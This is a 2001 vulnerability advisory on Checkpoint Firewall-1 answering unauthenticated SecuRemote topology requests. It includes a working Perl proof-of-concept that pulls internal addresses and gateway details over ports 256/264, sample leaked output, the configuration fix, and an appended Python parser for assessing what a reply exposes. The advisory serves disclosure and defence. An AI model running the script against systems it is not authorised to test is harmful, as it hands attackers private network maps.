Checkpoint Firewall-1 Information Disclosure Issue

Published: 2001-07-19
Updated: 2001-07-19
Severity: Medium
Threat: Server information disclosure
Error type: Configuration error
Exploitation method: Server mode

Affected systems

Checkpoint Firewall-1

Detailed description

Checkpoint Firewall-1 uses SecureRemote to establish encrypted sessions between the FW-1 module and users. Before a remote user communicates with internal hosts, the topology of the protected network is downloaded to the client. Newer versions of the FW-1 software can restrict topology downloads to authenticated sessions, but the default setting is flawed and accepts unauthenticated requests. As a result, an attacker can obtain information including IP addresses, network masks, and even some friendly descriptive information.

Test code

The following Perl script connects to the firewall and downloads the topology (if SecuRemote is running):

SensePost# perl sr.pl firewall.example.com
Testing on port 256
:val (
    :reply (
        : (-SensePost-dotcom-.hal9000-19.3.167.186
            :type (gateway)
            :is_fwz (true)
            :is_isakmp (true)
            :certificates ()
            :uencapport (2746)
            :fwver (4.1)
            :ipaddr (19.3.167.186)
            :ipmask (255.255.255.255)
            :resolve_multiple_interfaces ()
            :ifaddrs (
                : (16.3.167.186)
                : (12.20.240.1)
                : (16.3.170.1)
                : (29.203.37.97)
            )
            :firewall (installed)
            :location (external)
            :keyloc (remote)
            :userc_crypt_ver (1)
            :keymanager (
                :type (refobj)
                :refname ("#_-SensePost-dotcom-")
            )
            :name (-SensePost-dotcom-Neo16.3.167.189)
            :type (gateway)
            :ipaddr (172.29.0.1)
            :ipmask (255.255.255.255)
        )
--snip--

#!/usr/bin/perl
# A command-line tool that can be used to download network topology
# from Firewall-1's running SecureRemote, with the option "Allow
# unauthenticated cleartext topology downloads".
# Usage sr.pl IP
# Haroon Meer & Roelof Temmingh 2001/07/17
# haroon@sensepost.com - http://www.sensepost.com

use Socket;
if ($#ARGV<0) {die "Usage: sr.pl IP\n";}

$port=256;
$host=$ARGV[0];               # name or address given on the command line
$target=inet_aton($host);
print "Testing $host on port $port\n";

# Hex-encoded request: a binary header followed by the text "(topology-request ...)"
$SENDY= "410000000259052100000004c41e43520000004e28746f706f6c6f67792d726571756573740a093a63616e616d6520282d53656e7365506f73742d646f74636f6d2d290a093a6368616c6c656e67652028633265323331383339643066290a290a00";
$SENDY = pack("H*",$SENDY);

@results=sendraw($SENDY);

if ($#results == 0) {
    # Nothing useful on port 256: retry on port 264
    print "No results on port 256 - trying 264\n";
    $port=264;
    @results2=sendraw($SENDY);
    if ($#results2 == 0) {die "Sorry - no results\n";}
    print @results2;
} else {print @results;}

# Send the raw request to $target:$port and return the reply lines
sub sendraw {
    my ($pstr)=@_;
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
    if(connect(S,pack "SnA4x8",2,$port,$target)){
        my @in;
        select(S); $|=1; print $pstr;
        while(<S>){ push @in, $_;}
        select(STDOUT); close(S); return @in;
    } else { return ""; }
}
# Spidermark: sensepostdata fw1

Solution

Open Policy Properties, Desktop Security, and uncheck the "respond to unauthenticated topology requests" option.

Related information

haroon at sensepost.com
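
To assess what such a reply exposes about your own gateway, the following added example (not part of the original advisory or the SensePost script) parses the nested ":key (value)" format shown in the output above and groups the disclosed addresses, version strings and object names. The sample reply is constructed from that output, and the function names leaves and disclosed are this example's own.

```python
import ipaddress
import re

# Constructed sample: a shortened reply in the format of the advisory's output.
SAMPLE_REPLY = """:val (
  :reply (
    : (-SensePost-dotcom-.hal9000-19.3.167.186
      :fwver (4.1)
      :ipaddr (19.3.167.186)
      :ifaddrs ( : (16.3.167.186) : (12.20.240.1) )
      :keymanager ( :refname ("#_-SensePost-dotcom-") )
      :name (-SensePost-dotcom-Neo16.3.167.189)
      :ipaddr (172.29.0.1)
)))"""

TOKEN = re.compile(r'\(|\)|"[^"]*"|[^\s()]+')

def leaves(text):
    """Yield (attribute, value) for each value, using the nearest named attribute."""
    stack, pending = [], ""
    for tok in TOKEN.findall(text):
        if tok == "(":
            stack.append(pending)
            pending = ""
        elif tok == ")":
            del stack[-1:]                 # no error on a stray ")"
        elif tok.startswith(":"):
            pending = tok[1:]              # attribute name; empty for ": (...)"
        else:
            yield next((k for k in reversed(stack) if k), ""), tok.strip('"')

def disclosed(text):
    """Summarise what a topology reply reveals (helper written for this example)."""
    out = {"external": set(), "internal": set(), "versions": set(), "names": set()}
    for key, val in leaves(text):
        if key in ("ipaddr", "ifaddrs"):
            try:
                ip = ipaddress.ip_address(val)
            except ValueError:
                continue                   # not an address; ignore
            out["internal" if ip.is_private else "external"].add(str(ip))
        elif key == "fwver":
            out["versions"].add(val)
        elif key in ("reply", "name", "refname"):
            out["names"].add(val)
    return out

if __name__ == "__main__":
    print(disclosed(SAMPLE_REPLY))
```

Replies cut short, like the "--snip--" output above, are still parsed up to the point where they end.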